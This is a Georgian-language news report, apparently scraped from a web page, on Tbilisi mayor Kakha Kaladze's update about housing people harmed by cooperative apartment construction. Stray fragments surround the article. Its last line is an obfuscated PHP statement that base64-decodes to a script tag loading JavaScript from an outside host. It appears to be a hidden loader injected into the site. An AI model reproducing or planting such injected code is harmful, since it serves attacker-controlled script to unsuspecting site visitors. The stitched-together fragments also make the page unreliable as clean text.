celsiusi
ავერსი საქკაბელი

კოოპერატიული ბინათმშენებლობით დაზარალებული პირების დაკმაყოფილების მიზნით, 28 ინტერესთა გამოხატვა გამოცხადდა, რაც მთლიანობაში 28 პროექტს გულისხმობს. ამის შესახებ თბილისის მერმა, კახა კალაძემ დღეს დედაქალაქის მთავრობის სხდომაზე განაცხადა.

„მოგეხსენებათ, რომ კოოპერატიული ბინათმშენებლობის შედეგად დაზარალებულთა საკითხი სახელმწიფოს აღიარებული აქვს საშინაო ვალად, „სახელმწიფო ვალის შესახებ“ საქართველოს კანონით. დაზარალებულად ცნობილია 3500-ზე მეტი პირი. ჯამში, დაკმაყოფილებულია კოოპერატიული ბინათმშენებლობით დაზარალებული დაახლოებით 2500-მდე პირი.

კოოპერატიული ბინათმშენებლობით დაზარალებული პირების დაკმაყოფილების მიზნით, გამოცხადდა 28 ინტერესთა გამოხატვა. საუბარია, ჯამში 28 პროექტზე. აქედან 15 პროექტზე უკვე გაცემულია სამშენებლო ნებართვა, რომლის ფარგლებში დაკმაყოფილდება 1000-მდე პირი; სანებართვო ეტაპზეა ცხრა პროექტი და სამშენებლო ნებართვის გაცემის შემდეგ, დაკმაყოფილდება 550-მდე პირი; ხელშეკრულების გაფორმების ეტაპზეა ოთხი პროექტი, უკვე გამოვლენილია შესაბამისი გამარჯვებული ინვესტორები და შედეგად იგეგმება 400-მდე პირის დაკმაყოფილება“, – განაცხადა კახა კალაძემ.

მისივე თქმით, დღესდღეობით შემოსულია კიდევ 615-მდე დაზარალებული პირის განცხადება და ამ მოქალაქეების ალტერნატიული საცხოვრებელი ფართებით უზრუნველყოფა მოხდება მიმდინარე და მომდევნო წლის განმავლობაში.

„ყველა ოჯახი იქნება დაკმაყოფილებული. არ დაგვრჩება არცერთი ადამიანი, რომელიც ამ პრობლემის წინაშე დგას. ეს არის 30-წლიანი პრობლემა და ჩვენ ვართ იმ მთავრობის წარმომადგენლები, რომელიც დგამს კონკრეტულ ნაბიჯებს ამ ადამიანების საცხოვრებელი ფართებით დასაკმაყოფილებლად“, – განაცხადა კახა კალაძემ.

მერმა მადლობა გადაუხადა მუნიციპალიტეტის შესაბამისი სამსახურების წარმომადგენლებს, ასევე, სამშენებლო კომპანიებს, რომლებიც აღნიშნული პრობლემის მოგვარებაში არიან ჩართული. 

312
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");